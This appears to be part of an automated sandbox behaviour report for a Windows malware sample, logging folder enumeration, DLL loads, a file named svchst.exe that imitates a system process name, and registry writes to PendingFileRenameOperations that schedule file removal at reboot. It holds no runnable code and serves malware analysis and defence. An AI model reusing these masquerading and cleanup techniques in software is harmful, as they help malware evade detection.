C:\Documents and Settings\Administrator\Application Data\Identities BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Identities BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities\{5223274D-42A6-41C5-9E78-3A6606A65E5E} BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Identities BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects\WT8AYZWL BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\#SharedObjects BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com\support BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\macromedia.com BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateax BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateax BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateax BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com\bin BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player\www.macromedia.com BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia\Flash Player BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Macromedia BothDirectoryInformation unknown no more files 1 4141FC FindNextFileA
C:\Documents and Settings\Administrator\Application Data\Microsoft BothDirectoryInformation * success or wait 1 41410C FindFirstFileA
C:\Documents and Settings\Administrator\Application Data\Microsoft BothDirectoryInformation unknown success or wait 1 4141FC FindNextFileA
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activites
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\WS2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\Normaliz.dll write and read and execute unknown 330000 36864 own pid read write conflicting addresses 1
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 350000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 360000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 360000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 920000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 390000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 390000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 390000 4096 own pid readonly success or wait 1
unknown query and write and read commit 3B0000 20480 own pid read write success or wait 1
unknown query and write and read commit 3B0000 20480 own pid read write success or wait 1
unknown query and write and read commit 3B0000 20480 own pid read write success or wait 1
unknown query and write and read commit 3B0000 20480 own pid read write success or wait 1
unknown query and write and read commit 3B0000 20480 own pid read write success or wait 1
unknown query and write and read commit 3B0000 20480 own pid read write success or wait 1
unknown query and write and read commit 3B0000 20480 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit B20000 8462336 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit B20000 618496 own pid readonly success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_NetworkService_Local Settings_Temporary Internet Files_Content.IE5_index.dat_32768 write unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\C:_Documents and Settings_NetworkService_Local Settings_Temporary Internet Files_Content.IE5_index.dat_32768 query and write and read commit 3E0000 32768 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_NetworkService_Cookies_index.dat_16384 write unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\C:_Documents and Settings_NetworkService_Cookies_index.dat_16384 query and write and read commit 3F0000 16384 own pid read write success or wait 1
\BaseNamedObjects\Local\C:_Documents and Settings_NetworkService_Local Settings_History_History.IE5_index.dat_16384 write unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\C:_Documents and Settings_NetworkService_Local Settings_History_History.IE5_index.dat_16384 query and write and read commit B20000 16384 own pid read write success or wait 1
\KnownDlls\RASAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasapi32.dll query and write and read and execute image 76EE0000 245760 own pid read write success or wait 1
\KnownDlls\rasman.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasman.dll query and write and read and execute image 76E90000 73728 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
\KnownDlls\TAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\tapi32.dll query and write and read and execute image 76EB0000 192512 own pid read write success or wait 1
\KnownDlls\rtutils.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rtutils.dll query and write and read and execute image 76E80000 57344 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
C:\WINDOWS\system32\tapi32.dll read commit DB0000 184320 own pid readonly success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\msapsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msapsspc.dll query and write and read and execute image 71E50000 86016 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
\KnownDlls\schannel.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\schannel.dll query and write and read and execute image 767F0000 163840 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
\KnownDlls\digest.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\digest.dll query and write and read and execute image 75B00000 86016 own pid read write success or wait 1
\KnownDlls\msnsspc.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msnsspc.dll query and write and read and execute image 747B0000 290816 own pid read write success or wait 1
\KnownDlls\MSVCRT40.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcrt40.dll query and write and read and execute image 78080000 69632 own pid read write success or wait 1
C:\WINDOWS\system32\msv1_0.dll write and read and execute commit DF0000 139264 own pid execute success or wait 1
C:\WINDOWS\system32\msv1_0.dll query and write and read and execute image 77C70000 151552 own pid read write success or wait 1
\KnownDlls\cryptdll.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\cryptdll.dll query and write and read and execute image 76790000 49152 own pid read write success or wait 1
\KnownDlls\iphlpapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\iphlpapi.dll query and write and read and execute image 76D60000 102400 own pid read write success or wait 1
\KnownDlls\sensapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\sensapi.dll query and write and read and execute image 722B0000 20480 own pid read write success or wait 1
\BaseNamedObjects\SENS Information Cache read unknown DC0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit EF0000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit DD0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
C:\WINDOWS\system32\winrnr.dll write and read and execute commit DD0000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\winrnr.dll query and write and read and execute image 76FB0000 32768 own pid read write success or wait 1
\KnownDlls\WLDAP32.dll write and read and execute unknown 76F60000 180224 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
C:\WINDOWS\svchst.exe query and write and read and execute and extend size image 76FC0000 24576 own pid read write success or wait 1
\BaseNamedObjects\ShimSharedMemory write unknown FF0000 57344 own pid read write success or wait 1

Registry Activites
Key Path Key Value Name Completion Count Source Address Symbol
Key Value Modified
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager PendingFileRenameOperations unicode array 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 00 00 success or wait 1 414A20 MoveFileExA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager PendingFileRenameOperations unicode array 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 54 00 45 00 4D 00 50 00 5C 00 00 00 00 00 00 00 success or wait 1 414A20 MoveFileExA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager PendingFileRenameOperations unicode array 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 25 00 41 00 50 00 50 00 44 00 41 00 54 00 41 00 25 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 54 00 45 00 4D 00 50 00 5C 00 00 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 